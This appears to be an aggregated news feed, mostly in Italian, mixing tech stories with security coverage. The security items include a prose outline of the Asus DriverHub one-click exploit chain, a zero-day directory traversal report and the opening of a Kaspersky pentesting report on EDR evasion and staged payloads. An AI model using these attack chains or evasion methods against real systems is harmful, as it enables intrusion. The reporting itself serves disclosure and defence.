Salta al contenuto principale



The World’s Longest Range LED Flashlight


A man aims the LED flashlight into the night sky.

[ApprehensiveHawk6178] reports that they have made the world’s longest range LED flashlight! While technically “handheld”, you’re gonna need both hands for this monster. According to the creator, it draws 1.2 kW (20 A @ 60 V) to deliver 100,000 lumens and approximately 20,000,000 candelas.

This spotlight is made from 48 white LEDs, wired in 16S3P configuration, and is powered by a similarly beefy 20S2P battery pack. That 1.2 kW power draw generates a lot of heat which is dissipated with an array of heat sinks and five cooling fans. Total cost was in the order of $2,000 USD.

It can be controlled via Bluetooth, and can run from its batteries for 30 minutes at full power. If you’d like to geek out over the specs click-through and read the discussion, a lot of technical detail is given and there are a bunch of photos showing the internals and assembly.

We’ve seen high-output LED lights with water cooling in the past, and wonder if that might be the next step for this particular build.

Thanks to [kms] for the tip.


hackaday.com/2025/05/13/the-wo…



La CISA twitta la tua sicurezza! Ora le emergenze si leggono solo su X!


LaCybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti ha annunciato che d’ora in poi pubblicherà sul suo sito web solo gli avvisi più urgenti relativi a minacce emergenti o ad attività informatiche su larga scala. Altre comunicazioni, tra cui aggiornamenti del catalogo delle vulnerabilità, avvisi di sicurezza e avvisi specifici dei prodotti, saranno distribuite tramite e-mail, RSS e il social network X.

Finora, la sezione avvisi del sito web CISA ha trattato un’ampia gamma di argomenti, dalle vulnerabilità e bug sfruttabili nelle apparecchiature industriali alle vulnerabilità delle Smart TV. Ora l’attenzione si sposterà sulle informazioni veramente critiche, che richiedono attenzione immediata e devono essere facili da reperire.

Chi desidera rimanere aggiornato può iscriversi alle notifiche e-mail dell’agenzia o attivare un abbonamento RSS. Ad esempio, per rimanere aggiornati sugli aggiornamenti del catalogo delle vulnerabilità note sfruttabili (KEV), è necessario abbonarsi tramite GovDelivery. Inoltre, le informazioni di base saranno pubblicate in X.

Alla luce di questi cambiamenti, sorge spontaneo domandarsi: tutto questo è legato a tagli interni all’agenzia stessa? A marzo, la CISA ha iniziato a tagliare il personale nell’ambito dell’iniziativa DOGE, un progetto governativo volto a ridurre i costi nelle agenzie che interagiscono con l’impero commerciale di Elon Musk. I licenziamenti di massa potrebbero continuare, soprattutto considerando la proposta di Donald Trump di tagliare il bilancio dell’agenzia del 17% nel 2026.

L’ex capo della CISA, Jen Easterly, ha già criticato la proposta. Secondo lei, la riduzione delle capacità dell’agenzia, nel contesto delle crescenti minacce globali e delle perdite miliardarie dovute alla criminalità informatica, sta causando gravi danni alla capacità di difesa del Paese. Ha ricordato che in passato gli hacker cinesi erano penetrati in infrastrutture critiche degli Stati Uniti.

È interessante notare che non è solo la CISA a spostare le sue comunicazioni su X. Dopo gli incidenti aerei di febbraio, il National Transportation Safety Board ha dichiarato che avrebbe abbandonato le notifiche via e-mail in favore degli aggiornamenti tramite la sua pagina social media. Ad aprile, inoltre, la Social Security Administration ha iniziato a ridimensionare il proprio ufficio stampa, decidendo di eliminare i tradizionali comunicati stampa e le “lettere ai colleghi”. Ora tutte le informazioni possono essere trovate esclusivamente in X.

E anche se 280 caratteri non sono certo sufficienti per trasmettere informazioni importanti, forse le agenzie governative ora si abboneranno a X Premium per poter scrivere post più lunghi. In ogni caso, questa tendenza fa chiaramente il gioco di uno dei miliardari più vicini a Donald Trump. Le priorità in materia di sicurezza informatica stanno cedendo sempre più il passo alle ambizioni politiche.

L'articolo La CISA twitta la tua sicurezza! Ora le emergenze si leggono solo su X! proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Le cyber gang più pericolose del 2025: tecniche e tattiche di attacco


@Informatica (Italy e non Italy 😁)
Gruppi specializzati in attacchi ransomware, hacker di stato e organizzazioni dedite all’hacktivism: ecco il panorama delle minacce del 2025
L'articolo Le cyber gang più pericolose del 2025: tecniche e tattiche di attacco proviene da Cyber Security 360.



Akira, il ransomware a cui piacciono le Pmi


@Informatica (Italy e non Italy 😁)
Akira testimonia le attenzioni che il cyber crimine riserva alle Pmi. Come evitare il peggio e cosa fare quando si è vittima del ransomware
L'articolo Akira, il ransomware a cui piacciono le Pmi provienehttps://www.cybersecurity360.it/nuove-minacce/ransomware/akira-il-ransomware-a-cui-piacciono-le-pmi/



AI, simulations, and technology have revolutionized not just how baseball is played and managed, but how we experience it, too.#Baseball #AI


Spionaggio cyber: hacker pro-Turchia sfruttano zero-day contro l’esercito curdo


Microsoft ha segnalato che un autore di minacce affiliato alla Turchia è stato osservato mentre sfruttava una vulnerabilità zero-day in Output Messenger contro entità associate all’esercito curdo in Iraq. Il gruppo di hacker, identificato come Marbled Dust, Sea Turtle e UNC1326 e noto per la sua attività di spionaggio, in genere prende di mira entità in Europa e Medio Oriente, tra cui organizzazioni governative, di tecnologia informatica e di telecomunicazioni, nonché altre entità di interesse per il governo turco.

In precedenza, Marbled Dust era stato visto mentre analizzava risorse connesse a Internet alla ricerca di vulnerabilità note da sfruttare per l’accesso iniziale, oltre a compromettere registri DNS e/o registrar per spiare organizzazioni governative e rubare le loro credenziali. “Questo nuovo attacco segnala un notevole cambiamento nelle capacità di Marbled Dust, pur mantenendo la coerenza del suo approccio generale. L’utilizzo riuscito di un exploit zero-day suggerisce un aumento della sofisticazione tecnica e potrebbe anche indicare che le priorità di attacco di Marbled Dust siano aumentate o che i suoi obiettivi operativi siano diventati più urgenti”, osserva Microsoft .

Da aprile 2024, l’autore della minaccia ha utilizzato exploit per il CVE-2025-27920, una vulnerabilità nell’app di comunicazione aziendale Output Messenger. La falla è stata risolta a dicembre 2024, ma un identificatore CVE è stato rilasciato solo questo mese. Il problema è descritto come un difetto di directory traversal che potrebbe consentire agli aggressori di accedere a file sensibili e di rivelare informazioni private, nonché di eseguire codice arbitrario in remoto.

“Una vulnerabilità di directory traversal è stata identificata nella versione V2.0.62 di Output Messenger. Questa vulnerabilità consente ad aggressori remoti di accedere o eseguire file arbitrari manipolando i percorsi dei file con sequenze `../`. Sfruttando questa falla, gli aggressori possono navigare al di fuori della directory desiderata, esponendo o modificando potenzialmente file sensibili sul server”, afferma Srimax, l’azienda indiana che sviluppa l’applicazione di messaggistica, in un avviso .

Secondo Microsoft, la falla di sicurezza consente ad aggressori autenticati di caricare file arbitrari nella directory di avvio del server. Utilizzando credenziali compromesse, probabilmente ottenute tramite DNS hijacking o typo-squatting, Marbled Dust ha sfruttato la vulnerabilità CVE-2025-27920 per installare backdoor sui dispositivi delle vittime. Le backdoor hanno permesso agli aggressori di eseguire comandi arbitrari sui sistemi compromessi, con l’obiettivo finale di raccogliere informazioni preziose.

“Microsoft Threat Intelligence valuta con elevato grado di sicurezza che gli obiettivi dell’attacco sono associati all’esercito curdo operativo in Iraq, in linea con le priorità di attacco di Marbled Dust precedentemente osservate”, spiega Microsoft. La vulnerabilità CVE-2025-27920, insieme a una seconda vulnerabilità, identificata come CVE-2025-27921 non è stata ancora sfruttata, ma è stata corretta nella versione 2.0.63 di Output Messenger. Si consiglia agli utenti di aggiornare le proprie applicazioni il prima possibile.

L'articolo Spionaggio cyber: hacker pro-Turchia sfruttano zero-day contro l’esercito curdo proviene da il blog della sicurezza informatica.



Trackside Observations Of A Rail Power Enthusiast


The life of a Hackaday writer often involves hours spent at a computer searching for all the cool hacks you love, but its perks come in not being tied to an office, and in periodically traveling around our community’s spaces. This suits me perfectly, because as well as having an all-consuming interest in technology, I am a lifelong rail enthusiast. I am rarely without an Interrail pass, and for me Europe’s railways serve as both comfortable mobile office space and a relatively stress free way to cover distance compared to the hell of security theatre at the airport. Along the way I find myself looking at the infrastructure which passes my window, and I have become increasingly fascinated with the power systems behind electric railways. There are so many different voltage and distribution standards as you cross the continent, so just how are they all accommodated? This deserves a closer look.

So Many Different Ways To Power A Train

A British Rail Class 165 "Networker" train at a platform on Marylebone station, London.Diesel trains like this one are for the dinosaurs.
In Europe where this is being written, the majority of main line railways run on electric power, as do many subsidiary routes. It’s not universal, for example my stomping ground in north Oxfordshire is still served by diesel trains, but in most cases if you take a long train journey it will be powered by electricity. This is a trend reflected in many other countries with large railway networks, except sadly for the United States, which has electrified only a small proportion of its huge network.

Of those many distribution standards there are two main groups when it comes to trackside, those with an overhead wire from which the train takes its power by a pantograph on its roof, or those with a third rail on which the train uses a sliding contact shoe. It’s more usual to see third rails in use on suburban and metro services, but if you take a trip to Southern England you’ll find third rail electric long distance express services. There are even four-rail systems such as the London Underground, where the fourth rail serves as an insulated return conductor to prevent electrolytic corrosion in the cast-iron tunnel linings.
Two 1980s British rail trains with bright yellow ends, in a small British railway station. It's early summer, so the trees surrounding the station are in full leaf.These tracks in the south of England each have a 750 VDC third rail. Lamberhurst, CC BY-SA 4.0.
As if that wasn’t enough, we come to the different voltage standards. Those southern English trains run on 750 V DC while their overhead wire equivalents use 25 kV AC at 50Hz, but while Northern France also has 25 kV AC, the south of the country shares the same 3 kV DC standard as Belgium, and the Netherlands uses 1.5 kV DC. More unexpected still is Germany and most of Scandinavia, which uses 15 kV AC at only 16.7 Hz. This can have an effect on the trains themselves, for example Dutch trains are much slower than those of their neighbours because their lower voltage gives them less available energy for the same current.
A blue and yellow electric locomotive at a station platform, pointing forwards towards some tracks which curve to the left in the distance.This Dutch locomotive is on its 1.5 kV home turf, but it’s hauling an international service headed for the change to 3 kV DC in Belgium.
In general these different standards came about partly on national lines, but also their adoption depends upon how late the country in question electrified their network. For example aside from that southern third-rail network and a few individual lines elsewhere, the UK trains remained largely steam-powered until the early 1960s. Thus its electrification scheme used the most advanced option, 25 kV 50 Hz overhead wire. By contrast countries such as Belgium and the Netherlands had committed to their DC electrification schemes early in the 20th century and had too large an installed base to change course. That’s not to say that it’s impossible to upgrade though, as for example in India where 25 kV AC electrification has proceeded since the late 1950s and has included the upgrade of an earlier 1.5 kV DC system.

A particularly fascinating consequence of this comes at the moment when trains cross between different networks. Sometimes this is done in a station when the train isn’t moving, for example at Ashford in the UK when high-speed services switch between 25 kV AC overhead wire and 750 V DC third rail, and in other cases it happens on the move through having the differing voltages separated by a neutral section of overhead cable. Sadly I have never manged to travel to the Belgian border and witness this happening. Modern electric locomotives are often equipped to run from multiple voltages and take such changes in their stride.

Power To The People Movers

A Londom Underground deep tube station, looing doen the unoccupied platform.The 4-rail 750VDC system on the London Underground.
Finally, all this rail electrification infrastructure needs to get its power from somewhere. In the early days of railway electrification this would inevitably been a dedicated railway owned power station, but now it is more likely to involve a grid connection and some form of rectifier in the case of DC lines. The exception to this are systems with differing AC frequencies from their grid such as the German network, which has an entirely separate power generation and high voltage distribution system.

So that was the accumulated observations of a wandering Hackaday scribe, from the comfort of her air-conditioned express train. If I had to name my favourite of all the networks I have mentioned it would be the London Underground, perhaps because the warm and familiar embrace of an Edwardian deep tube line on a cold evening is an evocative feeling for me. When you next get the chance to ride a train keep an eye out for the power infrastructure, and may the experience be as satisfying and comfortable as it so often is for me.

Header image: SPSmiler, Public domain.


hackaday.com/2025/05/13/tracks…




I “mille miliardi” di Trump nel Golfo: affari, armi e regali presidenziali


@Notizie dall'Italia e dal mondo
L’agenda del taycoon parla la lingua del denaro: investimenti, vendite di armi, tecnologia e petrolio. Da Riad a Doha, fino ad Abu Dhabi, in gioco ci sono affari colossali e vantaggi personali, più che equilibri geopolitici
L'articolo I “mille miliardi” di



Asus sotto accusa! Dei bug critici in DriverHub consentono RCE con un solo clic!


Asus ha rilasciato delle patch che risolvono due vulnerabilità in Asus DriverHub. Se sfruttati con successo, questi problemi potrebbero consentire l’esecuzione remota di codice arbitrario. DriverHub è uno strumento che funziona in background e interagisce con il sito web driverhub.asus.com. È progettato per informare gli utenti sui driver che devono essere installati o aggiornati. Lo strumento utilizza il protocollo RPC e ospita un servizio locale con cui il sito può interagire tramite richieste API.

Un ricercatore indipendente neozelandese, noto con il soprannome MrBruh, ha scoperto due vulnerabilità in DriverHub che possono essere utilizzate per eseguire codice arbitrario da remoto. CVE-2025-3462 (punteggio CVSS 8,4) è una vulnerabilità di convalida dell’origine che consente a origini non autorizzate di interagire con le funzionalità del software tramite richieste HTTP contraffatte. CVE-2025-3463 (punteggio CVSS 9,4) è una vulnerabilità di convalida dei certificati che consente a fonti non autorizzate di influenzare il comportamento del sistema tramite richieste HTTP contraffatte.

Secondo MrBruh, questi bug consentono l’esecuzione di codice arbitrario come parte di un semplice attacco con un clic. Quindi, per prima cosa l’attaccante deve ingannare l’utente inducendolo a visitare il sottodominio driverhub.asus[.]com (ad esempio, driverhub.asus.com..com). È quindi necessario utilizzare l’endpoint DriverHub UpdateApp per eseguire la versione legittima del binario AsusSetup.exe con l’opzione di eseguire qualsiasi file ospitato sul dominio falso.

“Quando si avvia AsusSetup.exe, per prima cosa legge il file AsusSetup.ini, che contiene metadati sul driver”, spiega il ricercatore.– Se si esegue AsusSetup.exe con il flag -s, verranno eseguite tutte le operazioni specificate in SilentInstallRun. In questo caso, il file ini specifica uno script CMD che esegue l’installazione automatica headless del driver, ma è possibile eseguire qualsiasi cosa in questo modo.”

Infatti, per implementare con successo l’exploit, un aggressore deve solo creare un dominio e posizionarvi tre file: un payload dannoso da avviare, una versione modificata di AsusSetup.ini in cui SilentInstallRun punta al binario dannoso e AsusSetup.exe, che quindi utilizza questa proprietà per avviare il payload.

Dopo che il ricercatore ha segnalato le vulnerabilità all’azienda l’8 aprile 2025, entrambi i problemi sono stati risolti dagli sviluppatori Asus il 9 maggio. L’azienda ha dichiarato di non aver trovato alcuna prova che queste vulnerabilità fossero state sfruttate in attacchi reali. “Ho chiesto ad Asus se offrissero una ricompensa per il bug. Mi hanno detto di no, e che invece avrebbero inserito il mio nome nella Hall of Fame”, scrive MrBruh.

L'articolo Asus sotto accusa! Dei bug critici in DriverHub consentono RCE con un solo clic! proviene da il blog della sicurezza informatica.



Verso Ankara, il difficile sentiero del dialogo tra Mosca e Kiev. Scrive Trenta

@Notizie dall'Italia e dal mondo

Negli ultimi giorni, qualcosa si è mosso. Dopo mesi di guerra e retorica muscolare, dalla Russia è giunta una proposta di dialogo: Vladimir Putin ha manifestato la disponibilità a incontrare Volodymyr Zelensky il 15 maggio, in Turchia. Il presidente ucraino, pur



La BBC rivela i crimini delle truppe britanniche in Iraq e Afghanistan


@Notizie dall'Italia e dal mondo
Omicidi e insabbiamenti: un'inchiesta della BBC, basata sulla testimonianza di trenta veterani, denuncia i crimini di guerra commessi in Iraq e Afghanistan dalle truppe speciali di Londra
L'articolo La BBC rivela i crimini delle truppe britanniche in Iraq e Afghanistan proviene da Pagine



Missili da crociera lanciati da droni. Ecco il Banderol, la nuova arma di Mosca

@Notizie dall'Italia e dal mondo

Nel conflitto in Ucraina le forze armate russe hanno iniziato ad impiegare una nuova tipologia (e particolare) tipologia di missile da crociera. Il servizio d’Intelligence della Difesa ucraina (Gur) ha rivelato i dettagli del nuovo ordigno noto come S8000 “Banderol “(Бандероль, lemma russo traducibile come



Podcast Libia: Calma precaria dopo gli scontri di ieri. Ucciso un capo delle milizie


@Notizie dall'Italia e dal mondo
L’eliminazione di Abdulghani al Kikli, detto “Ghaniwa”, era pianificata da tempo. Questo il commento di molti a Tripoli dopo l’omicidio del comandante del Support Force Apparatus SSA, un delle milizie armate più potenti. Di ciò e degli scontri



Robot Umanoidi in Ogni Casa: Huawei e UBTech Lanciano la Nuova Rivoluzione


Huawei Technologies e UBTech Robotics hanno unito le forze per accelerare l’impiego di robot umanoidi nelle fabbriche e nelle case cinesi. I giganti della tecnologia hanno firmato l’accordo lunedì a Shenzhen, il polo dell’innovazione meridionale dove hanno sede entrambe le aziende.

I partner intendono trasformare gli sviluppi di laboratorio in un prodotto di massa che troverà applicazione sia nell’industria che nella vita di tutti i giorni. Nell’ambito della cooperazione, le aziende creeranno fabbriche “intelligenti” in cui lavoreranno robot umanoidi. Contemporaneamente, gli ingegneri lavoreranno alla progettazione robot di servizio per la casa, sia su due gambe che su una piattaforma con ruote.

Cosa si nasconde dietro il lato oscuro della tecnologia?

Con il supporto di Huawei, UBTech costruirà un centro di innovazione in cui si concentrerà sullo sviluppo dell'”intelligenza incarnata”. Questo speciale tipo di intelligenza artificiale consente di combinare le funzioni cognitive con il corpo fisico, consentendo ai robot di interagire in modo più efficace con il mondo che li circonda e di comprenderlo meglio.

Gli sviluppi di Huawei costituiranno la base tecnologica della partnership. L’azienda fornirà i processori Ascend e Kunpeng per i sistemi di intelligenza artificiale e utilizzerà anche le sue piattaforme cloud e i suoi modelli linguistici di grandi dimensioni. Tutte queste tecnologie contribuiranno a creare una nuova generazione di robot capaci di risolvere complessi problemi intellettuali.

Come sottolineato dai rappresentanti di entrambe le aziende, l’alleanza consentirà a Huawei di unire la propria esperienza nell’intelligenza artificiale e nel cloud computing con gli sviluppi specializzati di UBTech, leader riconosciuto nella creazione di robot di servizio “intelligenti“.

Il mercato ha reagito positivamente alla notizia della collaborazione: le azioni di UBTech sono aumentate di quasi il 10% il giorno dell’annuncio. Anche l’indice Hang Seng ha registrato la sua migliore performance dall’inizio di marzo, registrando un aumento del 3%. Gli analisti sostengono che questo ottimismo è dovuto in gran parte al miglioramento delle relazioni commerciali tra Stati Uniti e Cina.

La nuova partnership rafforzerà la posizione di Huawei nel mercato cinese della robotica in rapida crescita. La società di consulenza LeadeRobot prevede che il mercato nazionale dei robot potrebbe raddoppiare quest’anno, raggiungendo i 5,3 miliardi di yuan (732 milioni di dollari).

I robot umanoidi saranno uno dei principali motori di questa crescita. Secondo la società di ricerca TrendForce, sei su undici produttori cinesi di robot umanoidi prevedono di produrne più di mille unità ciascuno entro il 2025.

L'articolo Robot Umanoidi in Ogni Casa: Huawei e UBTech Lanciano la Nuova Rivoluzione proviene da il blog della sicurezza informatica.



Amministrative: chi sono gli 8 candidati sostenuti dalla campagna “Facciamo eleggere”


@Politica interna, europea e internazionale
Quest’anno sono otto i candidati e le candidate alle prossime elezioni amministrative sostenuti dalla campagna “Facciamo Eleggere”, promossa dal Forum Disuguaglianze e Diversità e dal comitato Ti Candido. A questi otto se ne aggiungono altri due, sostenuti




Oggi dalle 16.30, presso la Sala Polifunzionale di Palazzo Chigi si terrà la cerimonia di premiazione della prima edizione del concorso nazionale “No alla droga, no ad ogni forma di dipendenza” promosso dal #MIM, dal Dipartimento delle politiche cont…
#MIM




Studying QR Code Degradation


It’s fair to say that QR codes are a technology that has finally come of age. A decade or more ago they were a little over-hyped and sometimes used in inappropriate or pointless ways, but now they are an accepted and useful part of life.

They’re not without their faults though, one of which is that despite four increasingly redundant levels of error correction, there comes a point at which a degraded QR code can no longer be read. [HumanQR] is soliciting these broken QR codes for research purposes and inclusion in an eventual open-source database, and they’ll even have a shot at repairing your submissions for you.

It’s a problem inherent to all digital media, that once the limit of whatever error correction they contain has been reached, they arrive at a cliff-edge at which they go immediately from readability to non readability. The example given in the linked article is a locator tag on a stray cat, it had been rubbed away in part. Improving its contrast, sharply defining its edges, and improving the definition of its fiducials was able to revive it, we hope leading to the cat being returned home.

The idea is that by studying enough damaged codes it should be possible to identify the means by which they become degraded, and perhaps come up with a way to inform some repair software. Meanwhile if you are interested, you might want to learn more about how they work, the hard way.


hackaday.com/2025/05/13/studyi…



Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.


“In un cyberspazio globale e aperto, la piena sovranità digitale implica l’autorità complessiva di una nazione sui dati generati dai suoi cittadini, dall’amministrazione pubblica e dalle imprese. Ciò include la capacità di una nazione di impiegare tecnologie sicure per elaborare questi dati, supportate da una forza lavoro sufficiente, competente e fidata. Inoltre, comporta l’istituzione e il mantenimento di attivo di collaborazioni internazionali dinamiche e mirate, per affrontare proattivamente le minacce. Richiede infine, una società pienamente consapevole e educata sui rischi presenti nel cyberspazio”. In queste poche righe il professore Roberto Baldoni ha sintetizzato la sua idea di sovranità tecnologica raccontata nell’omonimo libro del Mulino (2025), Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.

Il saggio, riduzione aggiornata di un precedente testo in inglese dello stesso autore, Charting digital sovereignity. A survival playbook (Amazon, 2024), descrive in maniera sintetica i quattro ambiti che mettono a rischio la sovranità digitale intesa come autogoverno di dati, tecnologie, infrastrutture, persone, e cioè: a) gli attacchi informatici; b) le minacce alla supply chain delle forniture critiche; c) la diffusione delle tecnologie emergenti come Intelligenza artificiale e Quantum Computing; d) le minacce sociali, industriali, tecnologiche e ibride.

I quattro ambiti vengono analizzati da Baldoni facendo ricorso anche ad esempi di cronaca e sono ricchi di dettagli circa il modo di operare di threat insider, hacker e APT, illustrano gli attacchi DDoS e ransomware, e illustrano i rischi della supply chain con riferimento ai casi SolarWinds e Kaseya, all’emergenza dei chatbot e degli algoritmi predittivi, fino alla disinformazione costitutiva dei social network, citando i famosi casi della Brexit, del Pizzagate e del passaggio di mano di Twitter, oggi X.

Roberto Baldoni, veterano del settore, per venti anni docente di Sistemi distribuiti alla facoltà di Ingegneria della Sapienza Università di Roma, ideatore dell’Agenzia per la cybersicurezza nazionale e suo primo direttore dal 2021 al 2023, è tuttavia attento a chiarire che quello di sovranità digitale è un concetto mobile che gli stessi studiosi non hanno ancora definito in maniera univoca e che gli Stati nazione interpretano in maniera diversa. E tuttavia insiste su una definizione operativa, la capacità di una nazione di proteggere il proprio cyberspace come se proteggesse un territorio fisico, e il cui fallimento equivale a consegnare i suoi abitanti a un potere oscuro e incontrollabile, quello di un progresso dove attori malevoli sfruttano macchine che sopravanzano gli umani e aggirano tutti i contrappesi della democrazia.


dicorinto.it/articoli/recensio…



Pensavi di Essere al Sicuro? Il Vero Malware È Nella Tua Testa!


Nell’era dell’informazione, la cybersecurity si erge a baluardo contro minacce digitali in continua evoluzione. Tuttavia, le difese più sofisticate possono vacillare di fronte a un nemico invisibile e insidioso: i bias cognitivi che plasmano il nostro processo decisionale. Tra questi, il bias di ancoraggio emerge come un fattore critico, influenzando silenziosamente le valutazioni di rischio, le risposte agli incidenti e persino l’adozione di misure protettive. Comprendere la profonda connessione tra cybersecurity e questo meccanismo psicologico è fondamentale per rafforzare le nostre difese e navigare con maggiore consapevolezza il complesso panorama digitale.

Le manifestazioni del Bias di ancoraggio


Il bias di ancoraggio ci porta a fare eccessivo affidamento sulla prima informazione disponibile quando prendiamo decisioni in condizioni di incertezza. Questa “àncora” iniziale, anche se irrilevante o incompleta, influenza in modo sproporzionato i nostri giudizi successivi.

Nel contesto della cybersecurity, questo si traduce in una serie di vulnerabilità cognitive che i cybercriminali possono astutamente sfruttare:

  • Valutazione del Rischio: Un analista di sicurezza potrebbe ancorare la propria valutazione del rischio di un nuovo attacco a statistiche obsolete o a un incidente passato specifico, sottovalutando la potenziale portata o sofisticazione della minaccia attuale. L’àncora del “già visto” impedisce una valutazione fresca e completa.
  • Analisi delle Vulnerabilità: Un team di sicurezza potrebbe concentrarsi eccessivamente sulla prima vulnerabilità critica identificata da uno scanner automatico, ancorando a quel “punteggio alto” la propria priorità di intervento, trascurando vulnerabilità meno evidenti ma potenzialmente più sfruttabili in combinazione.
  • Risposta agli Incidenti: Durante un attacco, le prime informazioni frammentarie sulla sua origine o sul vettore iniziale potrebbero ancorare le indagini del team di risposta, portandoli a focalizzarsi su una pista errata e ritardando l’identificazione della vera causa e la mitigazione efficace.
  • Scelta di Soluzioni di Sicurezza: Il prezzo iniziale di una soluzione di sicurezza o la prima funzionalità accattivante presentata da un venditore possono agire come ancore potenti, influenzando la percezione del valore complessivo e oscurando la valutazione di alternative potenzialmente più adatte o di considerazioni a lungo termine.
  • Comportamento degli Utenti: Gli utenti finali possono ancorare la propria fiducia a elementi superficiali come un logo familiare in un’email di phishing o un tono rassicurante, ignorando segnali d’allarme più sottili e cadendo vittime di attacchi di social engineering.


Le Tattiche dei Cybercriminali


I cybercriminali, spesso senza una formale formazione in psicologia, dimostrano una sorprendente intuizione nel manipolare il bias di ancoraggio a proprio vantaggio. Le loro tattiche sono finemente calibrate per sfruttare la nostra tendenza ad affidarci alla prima informazione ricevuta. Un’email di phishing che imita alla perfezione la grafica e il tono della nostra banca crea un’ancora di familiarità e fiducia, rendendoci meno inclini a scrutinare attentamente il contenuto. Un messaggio allarmante che annuncia un’urgente violazione della sicurezza del nostro account innesca un’ancora emotiva di paura e ansia, spingendoci ad agire impulsivamente senza riflettere. Offerte online incredibilmente vantaggiose ancorano la nostra attenzione sul guadagno potenziale, distraendoci dai segnali d’allarme di una possibile truffa.

In sostanza, i criminali informatici gettano queste “ancore” psicologiche nel flusso delle nostre interazioni digitali, sapendo che la nostra mente, una volta agganciata, sarà più facilmente guidata verso azioni che compromettono la nostra sicurezza.

La Vera Vulnerabilità


In un’era in cui le minacce informatiche si evolvono con rapidità sorprendente, affidarsi unicamente a soluzioni tecnologiche per la difesa è come costruire una fortezza con fondamenta instabili. Il bias di ancoraggio ci svela una verità fondamentale: le vulnerabilità più pericolose non risiedono sempre nelle righe di codice, ma nelle scorciatoie mentali che adottiamo per navigare la complessità del mondo digitale.

Riconoscere il potere silenzioso di questa “prima impressione” – quel primo contatto visivo con un’email, quel titolo accattivante di un link, quell’allarme inaspettato sullo schermo – è un atto di consapevolezza cruciale, un invito a esercitare una vigilanza che trascende la mera tecnologia, abbracciando la profondità della psicologia umana.

Comprendere il bias di ancoraggio è come riconoscere la corrente insidiosa che ci spinge verso scogli digitali apparentemente sicuri; solo diventando marinai consapevoli delle sue forze invisibili potremo governare la nostra navigazione online con prudenza, evitando che la prima impressione diventi la nostra ultima, disastrosa, destinazione.

Ignorare la psicologia nella cybersecurity è come costruire un’imponente fortezza digitale dimenticando di presidiare le porte con sentinelle umane: per quanto solide siano le mura virtuali, una mente non consapevole dei bias resta una breccia aperta, un invito silenzioso per i predatori del cyberspazio.

L'articolo Pensavi di Essere al Sicuro? Il Vero Malware È Nella Tua Testa! proviene da il blog della sicurezza informatica.



Using a Mythic agent to optimize penetration testing



Introduction


The way threat actors use post-exploitation frameworks in their attacks is a topic we frequently discuss. It’s not just about analysis of artifacts for us, though. Our company’s deep expertise means we can study these tools to implement best practices in penetration testing. This helps organizations stay one step ahead.

Being experts in systems security assessment and information security in general, we understand that a proactive approach always works better than simply responding to incidents that have already occurred. And when we say “proactive”, we imply learning new technologies and techniques that threat actors may adopt next. That is why we follow the latest research, analyze new tools, and advance our pentesting expertise.

This report describes how our pentesters are using a Mythic framework agent. The text is written for educational purposes only and intended as an aid for security professionals who are conducting penetration testing with the system owner’s consent.

It’s worth noting that Kaspersky experts assign a high priority to the detection of the tools and techniques described in this article as well as many similar others employed by threat actors in real-world attacks.

These efforts to counter malicious actors use solutions like Kaspersky Endpoint Security that utilize the technologies listed below.

  • Behavioral analysis tracks processes running in the operating system, detects malicious activity, providing added security for critical OS components such as the Local Security Authority Subsystem Service process.
  • Exploit prevention stops threat actors from taking advantage of vulnerabilities in installed software and the OS itself.
  • Fileless threats protection detects and blocks threats that, instead of residing in the file system as traditional files, exist as scheduled tasks, WMI subscriptions, and so on.
  • There are many others too.

However, it’s worth noting that since our study discusses a sophisticated attack controlled directly by a malicious actor (or a pentester), more robust defense calls for a layered approach to security. This must incorporate security tools to help SOC experts quickly detect malicious activity and respond in real time.

These include Endpoint Detection and Response, Network Detection and Response and Extended Detection and Response solutions as well as Managed Detection and Response services. They provide continuous monitoring and response to potential incidents. Usage of threat intelligence to acquire up-to-date and relevant information about attacker tactics and techniques is another cornerstone of comprehensive defense against sophisticated threats and targeted attacks.

This study is the product of our exploration and analysis: how we as defenders can best prepare and what we should expect. What follows is part one of the report in which we compare pentesting tools and choose the option that suits the objectives of our study. Part two deals with how to communicate with the chosen framework and achieve our objectives.

Pentester tools: how to choose

An overview of ready-made solutions


Selecting pentesting tools can prove a challenging task. Few pentesters can avoid detection by EPP or EDR solutions. As soon as a pentesting tool gains popularity among attackers, defensive technologies begin detecting not only its behavior, but also its individual components. Besides, the ability to detect the tool becomes a key performance indicator for these technologies. As a result, pentesters have to spend more time preparing for a project.

At the same time, many existing solutions have flaws that impede pentesting. Ethical hackers, for example, frequently use Cobalt Strike. The Beacon agent uses a specific opcode sequence in platform version 4.9.1. To avoid detection by security solutions, opcodes must be changed, but that breaks the agent.

Immutable opcode sequence for Cobalt Strike agent
Immutable opcode sequence for Cobalt Strike agent

Another example is Metasploit’s Meterpreter payload, whose signatures appear in Microsoft’s antivirus database more than 230 times, making the tool significantly more difficult to use in projects.

The Sliver framework is an open-source project. It is in active development, and it can handle pentesting tasks. However, this project has a number of drawbacks, too.

  1. The size of a payload generated by the framework is 8–9 megabytes. This reduces flexibility because the ideal size of a pentesting agent that ensures versatility is about 100 KB.
  2. Stability issues. We’ve seen active sessions drop. The framework once lacked support for automatically using a proxy server from the Windows configuration, which also complicated its use. This has since been addressed.

The Havoc framework and its Demon payload are currently gaining popularity: both are evolving, and both support evasion techniques. However, the framework currently suffers from a lack of compliance with operational security (OPSEC) principles and stability issues. Additionally, payload customization in Havoc is limited by rigid parameters.

As you can see, we cannot fully rely on open-source projects for pentesting due to their significant shortcomings. On the other hand, creating tools from scratch would require extra resources, which is inefficient. So, it’s crucial to strike the right balance between building in-house solutions and leveraging open-source projects.

Payload structure


First, let’s define what kind of payload is required for pentesting. We had decided to split it into three modules: Stage 0, Stage 1 and Stage 2. The first module, Stage 0, creates and runs the payload. It must generate an artifact, such as a shellcode, a DLL or EXE file, or a VBA script, and provide maximum flexibility by offering customizable parameters for running the payload. This module also handles the circumvention of security measures and monitors the runtime environment.

The second module (Stage 1) must allow the operator to examine the host, perform initial reconnaissance, and then use that information to establish persistence via a payload maintaining covert communications. After successfully establishing persistence, this module must launch the third module (Stage 2) to perform further activities such as lateral movement, privilege escalation, data exfiltration, and credential harvesting.

Three payload modules
Three payload modules

